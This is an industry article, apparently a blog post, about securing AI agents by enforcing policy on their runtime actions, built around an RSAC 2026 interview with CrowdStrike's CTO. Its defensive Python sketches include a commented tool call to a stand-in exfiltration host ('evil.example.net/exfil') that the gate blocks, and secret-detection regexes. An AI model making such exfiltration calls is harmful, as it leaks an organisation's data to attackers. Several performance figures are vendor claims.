
The Agentic Threat Surface Already Has A Defense

The cybersecurity industry has spent the better part of two years trying to figure out how to secure AI agents. Most of that energy has pointed upstream: model governance, configuration hardening, intent-based policy layers, guardrails. Those things aren’t wrong. But they’re not enough, and focusing too heavily on them means the industry may be looking for the answer in the wrong place.

I had an opportunity to chat with Elia Zaitsev, CTO at CrowdStrike, at RSAC 2026, and the conversation kept coming back to one point. The real question in agentic security isn’t what an agent intends to do. It’s what you allow it to actually do.

Intent Isn’t the Problem

“The problem isn’t when an agent, whether it’s been hijacked or hallucinates and says, ‘I want to go call out to this untrusted remote server,'” Zaitsev said. “The fact that it intends to do that is not the problem. The problem is, do you allow that to occur or not?”

That framing should be familiar to anyone who thinks in terms of kill chains. You have opportunities to stop an attack at every stage, but the damage is done by actions on objectives. With AI agents, the same logic applies. The reasoning that happens inside the model is opaque, non-deterministic, and fast. But the actions that come out the other end are concrete, observable, and controllable.

“If only we had technology that was able to understand the lineage of behaviors and conclusively track all the actions on a runtime system, be able to apply policy, be able to prevent it pre-execution from occurring,” Zaitsev mused sarcastically. “We do. It’s called EDR. It runs on the endpoint, it runs in the cloud, and it’s been a 15-year-plus product that has been matured and tested at scale.”

A Deterministic Problem at the End of a Non-Deterministic Chain

The part people fixate on, the agent’s internal reasoning, is genuinely hard to control. It’s a black box, it can surprise you, and intent-based guardrails only go so far. Upstream controls matter, and they help filter out noise, but the reasoning layer isn’t fully solvable in the way people sometimes imply.

The action layer is different. Once an agent reaches out to execute something in the real world—call an API, access a file, move laterally across a network—that activity is deterministic, structured, and visible. That’s the layer where defenders have the most leverage. And it’s the same layer where endpoint detection and response has been doing exactly this work for over a decade, just against human attackers.
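
To make that concrete, here is a minimal sketch in Python of what an action-layer gate looks like. Nothing in it is CrowdStrike’s implementation; the names, the allowlist, and the policy rules are all invented for illustration. The structural point is what matters: the decision runs on the concrete action, after the model has already done its unknowable reasoning.

```python
from dataclasses import dataclass
from urllib.parse import urlparse

# Hypothetical sketch of a pre-execution policy gate for agent tool calls.
# None of these names come from CrowdStrike or any real EDR product.

ALLOWED_HOSTS = {"api.internal.example.com", "tickets.example.com"}
READ_ONLY_PATHS = ("/etc/", "/usr/")

@dataclass
class AgentAction:
    kind: str      # e.g. "http_request", "file_write", "exec"
    target: str    # URL, file path, or command line
    agent_id: str  # which agent asked

def policy_allows(action: AgentAction) -> bool:
    """Deterministic allow/deny decision on the concrete action,
    regardless of what the model 'intended'."""
    if action.kind == "http_request":
        return urlparse(action.target).hostname in ALLOWED_HOSTS
    if action.kind == "file_write":
        return not action.target.startswith(READ_ONLY_PATHS)
    return False  # unknown or high-risk action kinds fail closed

def execute(action: AgentAction):
    if not policy_allows(action):
        # Block pre-execution and leave an auditable trail.
        raise PermissionError(f"{action.agent_id}: blocked {action.kind} -> {action.target}")
    ...  # dispatch to the real tool here

# A hijacked or hallucinating agent can *intend* anything; this call still fails closed:
# execute(AgentAction("http_request", "https://evil.example.net/exfil", "agent-7"))
```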

Agents may be faster and less predictable in their reasoning than a human attacker, but they still have to do things in the real world to cause damage. And doing things in the real world—on endpoints, in cloud environments, across identity systems—is precisely the terrain where that defense technology already operates.

The SOC Problem Is Already Here

The challenge isn’t just about securing agents from outside attack. It’s about how the enterprise uses them at all. The whole reason organizations are deploying AI in the SOC is that alert volume already exceeds human capacity. If a person can review every decision the agent makes, you didn’t actually need the agent. And the pace is only going to accelerate.

There’s a compounding effect at work. The attack surface grows as agents multiply across the enterprise. Adversaries are adopting agentic tools, too. And even well-intentioned detection engineering adds pressure: because the cost of false positives drops sharply when automated triage absorbs them, detection engineers can afford to run noisier detections and catch threats hiding in alerts they’d have thrown away before. CrowdStrike says its agentic detection triage achieves accuracy equivalent to a human analyst at a fraction of the time and cost, which changes the math considerably.

Zaitsev noted that historically, a detection with a 50% false positive rate was too noisy to ship. If automated triage absorbs that noise at near-zero marginal cost, you start deploying detections you’d previously discarded. Volume goes up. The case for human review of every alert gets weaker by the quarter.
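
Rough numbers make the shift obvious. Every figure below is invented for illustration, not drawn from CrowdStrike; only the 50% false positive rate comes from Zaitsev’s example.

```python
# Back-of-the-envelope math on detection economics.
# All dollar figures are assumptions for illustration, not vendor numbers.

alerts_per_day = 200          # daily firings of one noisy detection
false_positive_rate = 0.50    # Zaitsev's "too noisy to ship" threshold
human_cost_per_alert = 30.0   # assumed analyst time per triage, in dollars
agent_cost_per_alert = 0.10   # assumed marginal cost of automated triage

wasted_fp_alerts = alerts_per_day * false_positive_rate

print(f"Human triage burns ${wasted_fp_alerts * human_cost_per_alert:,.0f}/day on false positives")
print(f"Automated triage burns ${wasted_fp_alerts * agent_cost_per_alert:,.2f}/day on the same noise")
# Human triage burns $3,000/day on false positives
# Automated triage burns $10.00/day on the same noise
```

At those assumed rates, the detection that was an unaffordable analyst tax becomes a rounding error, which is exactly why previously discarded detections start shipping.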

Building Trust Before the Handoff

Higher autonomy requires established trust first. Early Waymo vehicles kept a safety driver in the seat, ready to take the wheel, and the human came out only after trust was earned. The progression wasn’t about removing human control as fast as possible; it was about accumulating enough validated data to justify each next step.

The same logic needs to apply in security. A lot of what’s happening right now with agentic AI is closer to what you might call vibe evaluation: run a demo, see it work once, call it good. That’s not a foundation for trust, and it’s not a foundation for detecting problems when things change. The path forward requires benchmarking, auditing, and continuous measurement—the kind of discipline that tells you when a model has drifted before the results get bad.
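
What continuous measurement might look like in code, as a hypothetical sketch: score agent verdicts against human-reviewed labels in a rolling window and alarm when accuracy slips below its validated baseline. The window size, baseline, and margin here are assumptions, not anything Zaitsev specified.

```python
from collections import deque

# Hypothetical drift monitor for an agentic triage model. All thresholds
# are illustrative assumptions, not CrowdStrike's methodology.

WINDOW = 500              # last N agent verdicts with known ground truth
BASELINE_ACCURACY = 0.95  # established during the supervised phase
DRIFT_MARGIN = 0.03       # tolerated dip before raising an alarm

recent = deque(maxlen=WINDOW)

def record_verdict(agent_verdict: str, analyst_verdict: str) -> None:
    """Score each agent decision against a human-reviewed label."""
    recent.append(agent_verdict == analyst_verdict)

def drift_detected() -> bool:
    if len(recent) < WINDOW:
        return False  # not enough data yet; stay in supervised mode
    accuracy = sum(recent) / len(recent)
    return accuracy < BASELINE_ACCURACY - DRIFT_MARGIN

# In operation: when drift_detected() flips True, autonomy gets dialed
# back and humans re-enter the loop -- the Waymo progression in reverse.
```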

That matters more in cybersecurity than in almost any other domain. Zaitsev pointed out that an agent that writes marketing copy operates in a domain that changes slowly. An agent that files taxes operates in a domain that changes, but the changes are public. Cybersecurity is neither. Adversaries innovate in private. You won’t know when they’ve shifted tradecraft until your models stop working. Human expertise is still the mechanism by which those shifts get detected, responses get built, and updated capability gets pushed back into the automated stack.

What CrowdStrike Announced at RSAC 2026

CrowdStrike put several products on the table at RSAC 2026 that reflect this thinking. Agentic MDR, delivered through Falcon Complete, combines deterministic automation with AI-driven investigation and human oversight for complex decisions. Internal testing showed investigations up to 5x faster compared to the longest human investigation times, and more than 3x higher triage accuracy in high-confidence benign classification when powered by NVIDIA Nemotron models. New SOC Transformation Services are aimed at helping organizations build the operational foundation—data pipelines, governance, workflow design—needed to actually run an agentic SOC.

Falcon Data Security addresses a different dimension of the same problem: data theft. Legacy data protection tools were built for a world where data was static. In the agentic enterprise, data is constantly moving—across endpoints, SaaS applications, cloud, browser, and AI workflows. The product is designed to discover, classify, and stop data theft in real time across that entire surface.
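
CrowdStrike didn’t walk through internals, but the core move, classifying content at the moment it crosses a boundary rather than scanning it at rest, can be sketched. Everything below (the patterns, the trust list, the block decision) is illustrative, not Falcon Data Security’s actual logic.

```python
import re

# Illustrative sketch of inline classification for data in motion.
# Patterns and policy are placeholders, not any product's internals.

CLASSIFIERS = {
    "ssn":     re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "api_key": re.compile(r"\bsk-[A-Za-z0-9]{20,}\b"),
}

def classify(payload: str) -> set[str]:
    """Label a payload the moment it moves, not after it lands."""
    return {label for label, rx in CLASSIFIERS.items() if rx.search(payload)}

def allow_egress(payload: str, destination: str, trusted: set[str]) -> bool:
    if classify(payload) and destination not in trusted:
        return False  # block in real time and alert
    return True

# The same check applies whether the mover is a user, a script, or an AI agent:
# allow_egress("key=sk-abc123...", "paste.example.net", trusted={"s3.internal"})
```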

Charlotte AI AgentWorks opens the platform to third-party developers building their own agents, with the goal of letting organizations create security agents on the Falcon platform rather than standing up separate systems with no runtime oversight baked in.

The Tools Already Exist

The security industry doesn’t need to build an entirely new category of tools to address the agentic threat surface. The principles proven against human attackers translate directly. Intercept the kill chain before actions on objectives. Apply policy at the runtime layer. Use telemetry to understand behavior lineage. Audit, benchmark, adjust.

“I don’t disagree. Applying known user behavior controls to agents is a no-brainer,” explained Richard Stiennon, author of “Guardians of the Machine Age: Why AI Security Will Define the Future of Digital Defense.” “This is why the problem has breathed new life into the identity and access management space. But most organizations are so concerned about agent security that they are failing to leverage agents in their operations. Agents represent the biggest productivity gain in economic history. Yes, secure agents, but much more importantly: Deploy agents!”

The defense tools exist. Whether organizations trust them enough to actually use them on agents is a different question.
